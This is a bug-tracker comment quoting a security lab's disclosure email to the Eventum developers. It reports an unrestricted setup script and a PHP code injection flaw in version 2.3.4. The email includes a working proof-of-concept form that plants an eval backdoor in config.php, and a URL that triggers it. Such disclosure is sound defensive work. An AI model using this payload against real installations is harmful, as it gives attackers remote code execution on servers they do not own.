Comment 1 for bug 1271499

Hello,

High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in your product - Eventum.

Detailed description and all available details of the vulnerabilities is provided below in the email.

Please notify us by replying to this email when you release a security update, and provide us if possible with URL of patch/solution so we can add this URL to the advisory.

If you need more time to fix the vulnerabilities - please specify desired Public Disclosure date by replying to this email.

For any questions related to this notification email - please visit our General Information & Disclosure Policy page: https://www.htbridge.com/advisory/disclosure_policy.html

If you don't find an answer to your question there - please feel free to contact us by email: <email address hidden>

===============================================================

Advisory ID: HTB23198
Reference: https://www.htbridge.com/advisory/HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Public Disclosure: February 12, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.

1) Incorrect Default Permissions in Eventum

The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.

The installation script can be access by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php

2) Code Injection in Eventum

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server.

The following exploitation example injects a backdoor into "/config/config.php" file:

<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" <email address hidden>">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>

After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

===============================================================

Best regards,

High-Tech Bridge Security Research Lab